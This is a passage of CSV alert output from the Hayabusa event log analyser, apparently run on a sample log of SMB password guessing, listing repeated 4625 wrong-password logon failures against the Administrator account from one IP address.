NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.673 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lKZAB1nfXPYSLxsE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.724 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tYkOsX0XDpkdvp01 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.779 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: r9y7HjOeGPcrdj1c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.823 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RLwh8Lg3nvbm8Q2p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.874 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: QoMkBcp8ouIgpX4m : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:35.918 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2UnrDiOAOec5DQGQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:35.976 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: UxJGLShj5EDKLSDZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.033 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: iWhaz8W0VLQdXKWN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.081 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 82YDxSIBnCAqdK4c : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.124 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 795b7XqsxokIGJyM : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.172 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1BmnyTsmP2XqMzf1 : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.221 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: NB3xsYe3RcPXhDib : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.264 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: yxN9i8exdO2h4oa7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.300 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vjcQaeuo4f8wFXhv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.351 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zCzr77BhliB4KKeb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.401 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Z558005RepKaO1zZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:36.448 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 9HFzW25mJz4JLkv7 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.490 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Y7J8m97GQWt2cbSs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJrVwcpABBaZ8cyY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VcDw3I4BaFLdIeCZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.637 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: egEpV9aAuCFjwx2I : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.677 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: th0ZLWF4YeOaNnkK : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.712 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ahrOLfdy6DCQ9SfO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.751 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xiooSdP5eib8PUE3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.794 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: s6nQ2jp9IGYnGeyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.839 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ejMtyR5QNdJFhw1W : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.873 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: e50kO0aVhfw5np5T : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:36.913 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 176XyLw6IhEI6NuD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.956 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KXCzCSSFvpbWNJFd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:36.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XhHRuZYlH8hekaKc : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.026 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZGIUBFRMQ3OBbOA0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.077 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: R7CTT5g1w58eRRlS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.117 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JmVccmad66uOK9ox : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.163 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: t1jlT6kEcs14dcNZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.209 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rBty5jOGkkZSZEyD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.245 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0Ci7YUsO5MtFkDSW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.347 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 12JToliq9mmAuMTQ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: lw9AgAvBGWoXBlim : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:37.418 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ReGDyvRpGknAKqqB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.469 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 6mdUn8na4asRfpJP : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.528 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b7Wm5p4HnNCbkyh2 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.585 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MQZwerVd6E08X8Ou : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.625 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbDjtLKoX5Q77bn5 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.669 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: O7BNKHiPjzJKCaDk : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.714 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: HHqBI8bzZn5VO9gq : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.757 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Xz2ZO3b3QSh6Rdqt : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.797 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IEfdhrwbTfCpCXKC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.844 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: kc0LuQzAmQTIF1X3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.896 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WMZ70YmzpVp2h8mY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:37.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FFVr3Amq6mA3umiu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:37.985 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnN15vqZcww8pqTK : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.027 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sSuMRF1txQ9g2Mwi : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.073 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tUuapChhs4CGO1cS : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.119 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dIMr0hjIkwD8AaEG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.173 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8ww9HMQX0cqmolYQ : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.210 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XJRRZ5e9lARVZDar : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.260 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: VvUzVoSLqFPAXSWE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.304 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SMMgPu1VJIjAWPDW : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1JjIa4nOKDTLuAD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.377 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0J0GJIm1UUXHH9QJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:38.419 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YmVX3xIz0hrQFvPr : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.470 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nv4tKFEmHjiXkVDI : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.500 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esdHHJl9LBek9pIo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.545 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MWofwwLjwiyBk39P : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.589 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dvsHFZe7Z1uJ9Dkv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.629 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 8aDdgwvb1zsZF79k : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.668 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AQUb6CnMUtyrMNhF : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.701 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KP5OxHPsbLHnIUBE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.744 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Ysg903vYFhQHYvFJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.793 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: IySarHtsTvwSP56H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.828 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: GnUy8tbCIAVnmhDg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 
01:51:38.863 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bfBtc4MnMtPG6MpC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 37b8MGIHY8QwXf9K : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.945 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eDuaWikplDmJNmIE : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:51:38.989 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 0kSSoAYJILHCPI7K : IP Address: 192.168.198.149 